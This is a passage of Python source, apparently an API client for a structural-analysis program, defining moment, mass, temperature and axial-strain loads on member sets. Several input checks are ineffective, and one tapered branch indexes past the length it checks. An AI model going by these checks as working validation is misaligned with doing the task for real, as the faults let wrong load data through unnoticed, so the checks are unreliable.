if 'eccentricity_horizontal_alignment' and 'eccentricity_vertical_alignment' and 'eccentricity_section_middle' \
'is_eccentricity_at_end_different_from_start' and 'eccentricity_y_at_end' and 'eccentricity_y_at_start' \
'eccentricity_z_at_end' and 'eccentricity_z_at_start' in params:
pass
else:
raise Exception("WARNING: Params does not contain all the necessary parameters. Kindly check dictionary")
params_ecc = {'eccentricity_horizontal_alignment': MemberSetLoadEccentricityHorizontalAlignment.ALIGN_NONE,
'eccentricity_vertical_alignment': MemberSetLoadEccentricityVerticalAlignment.ALIGN_NONE,
'eccentricity_section_middle': MemberSetLoadEccentricitySectionMiddle.LOAD_ECCENTRICITY_SECTION_MIDDLE_CENTER_OF_GRAVITY,
'is_eccentricity_at_end_different_from_start': False,
'eccentricity_y_at_end': 0.0,
'eccentricity_y_at_start': 0.0,
'eccentricity_z_at_end': 0.0,
'eccentricity_z_at_start': 0.0}
params_ecc.update(params)
if params_ecc['is_eccentricity_at_end_different_from_start'] == False:
clientObject.eccentricity_horizontal_alignment= params_ecc['eccentricity_horizontal_alignment'].name
clientObject.eccentricity_vertical_alignment= params_ecc['eccentricity_vertical_alignment'].name
clientObject.eccentricity_section_middle = params_ecc['eccentricity_section_middle'].name
clientObject.eccentricity_y_at_end= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_y_at_start= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_z_at_end= params_ecc['eccentricity_z_at_start']
clientObject.eccentricity_z_at_start= params_ecc['eccentricity_z_at_start']
elif params_ecc['is_eccentricity_at_end_different_from_start'] == True:
clientObject.eccentricity_horizontal_alignment= params_ecc['eccentricity_horizontal_alignment']
clientObject.eccentricity_vertical_alignment= params_ecc['eccentricity_vertical_alignment']
clientObject.eccentricity_section_middle = params_ecc['eccentricity_section_middle']
clientObject.eccentricity_y_at_end= params_ecc['eccentricity_y_at_end']
clientObject.eccentricity_y_at_start= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_z_at_end= params_ecc['eccentricity_z_at_end']
clientObject.eccentricity_z_at_start= params_ecc['eccentricity_z_at_start']
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
if 'eccentricity_horizontal_alignment' or 'eccentricity_vertical_alignment' or 'eccentricity_section_middle' or 'is_eccentricity_at_end_different_from_start' or 'eccentricity_y_at_end' or 'eccentricity_y_at_start' or 'eccentricity_z_at_end' or 'eccentricity_z_at_start':
pass
else:
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Moment(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction= MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
comment (str, optional): Comments
params (dict, optional): Parameters
for LOAD_DISTRIBUTION_UNIFORM:
load_parameter = magnitude
for LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [relative_distance = False, magnitude, distance_a]
for LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude, count_n, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, relative_distance_c = False, magnitude, distance_a, distance_b, distance_c]
for LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_TAPERED:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_MOMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution= load_distribution.name
#Load Magnitude and Parameters
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_1":
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
if load_parameter[0] == False:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_absolute = load_parameter[2]
else:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_relative = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_N":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude = load_parameter[2]
clientObject.count_n = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2x2":
try:
len(load_parameter)==7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.distance_c_is_defined_as_relative = load_parameter[2]
clientObject.magnitude = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
if load_parameter[2] == False:
clientObject.distance_c_absolute = load_parameter[6]
else:
clientObject.distance_c_relative = load_parameter[6]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_TRAPEZOIDAL":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_TAPERED":
try:
len(load_parameter)==4
except:
raise Exception("WARNING: Load parameter array length should be 4 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_PARABOLIC":
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Member Load Direction
clientObject.load_direction = load_direction.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Mass(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
individual_mass_components: bool=False,
mass_components = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
individual_mass_components (bool): Individiual Mass Components Option
mass_components (list): Mass Components
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
clientObject.load_type = MemberSetLoadType.E_TYPE_MASS.name
# Member Load Distribution
clientObject.load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Individual Mass Components
if type(individual_mass_components) == bool:
pass
else:
raise Exception("WARNING: Type of individual mass components should be bool. Kindly check inputs correctness.")
clientObject.individual_mass_components = individual_mass_components
# Mass magnitude
if individual_mass_components == False:
clientObject.mass_global = mass_components[0]
else:
clientObject.mass_x = mass_components[0]
clientObject.mass_y = mass_components[1]
clientObject.mass_z = mass_components[2]
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Temperature(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [tt, tb]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
for load_over_total_length: bool= False:
load_parameter = [tt1, tt2, tb1, tb2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_over_total_length: bool= True:
load_parameter = [tt1, tt2, tb1, tb2]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [tt1, tt2, tb1, tb2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [tb1, tb2, tb3, tt1, tt2, tt3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_TEMPERATURE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==2
except:
raise Exception("WARNING: Load parameter array length should be 2 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b = load_parameter[0]
clientObject.magnitude_t_t = load_parameter[1]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_t_1 = load_parameter[2]
clientObject.magnitude_t_t_2 = load_parameter[3]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_t_1 = load_parameter[2]
clientObject.magnitude_t_t_2 = load_parameter[3]
if type(load_parameter[4]) == bool:
pass
else:
raise Exception("WARNING: Type of the fourth load parameter should be bool. Kindly check inputs correctness.")
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if type(load_parameter[5]) == bool:
pass
else:
raise Exception("WARNING: Type of the fifth load parameter should be bool. Kindly check inputs correctness.")
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_b_3 = load_parameter[2]
clientObject.magnitude_t_t_1 = load_parameter[3]
clientObject.magnitude_t_t_2 = load_parameter[4]
clientObject.magnitude_t_t_3 = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==4
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = load_parameter[i][2]
mlvlp.magnitude_delta_t = load_parameter[i][3]
mlvlp.magnitude_t_t = load_parameter[i][2]
mlvlp.magnitude_t_b = load_parameter[i][3]
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def TemperatureChange(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [tc, delta_t]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
for load_over_total_length: bool= False:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_over_total_length: bool= True:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [delta_t_1, delta_t_2, delta_t_3, t_c_1, t_c_2, t_c_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_TEMPERATURE_CHANGE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==2
except:
raise Exception("WARNING: Load parameter array length should be 2 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t = load_parameter[0]
clientObject.magnitude_t_c = load_parameter[1]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_t_c_1 = load_parameter[2]
clientObject.magnitude_t_c_2 = load_parameter[3]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_t_c_1 = load_parameter[2]
clientObject.magnitude_t_c_2 = load_parameter[3]
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_delta_t_3 = load_parameter[2]
clientObject.magnitude_t_c_1 = load_parameter[3]
clientObject.magnitude_t_c_2 = load_parameter[4]
clientObject.magnitude_t_c_3 = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==4
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = load_parameter[i][2]
mlvlp.magnitude_delta_t = load_parameter[i][3]
mlvlp.magnitude_t_t = load_parameter[i][2]
mlvlp.magnitude_t_b = load_parameter[i][3]
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def AxialStrain(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [epsilon]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
load_parameter = [epsilon1, epsilon2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [epsilon1, epsilon2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [epsilon1, epsilon2, epsilon3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_AXIAL_STRAIN
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
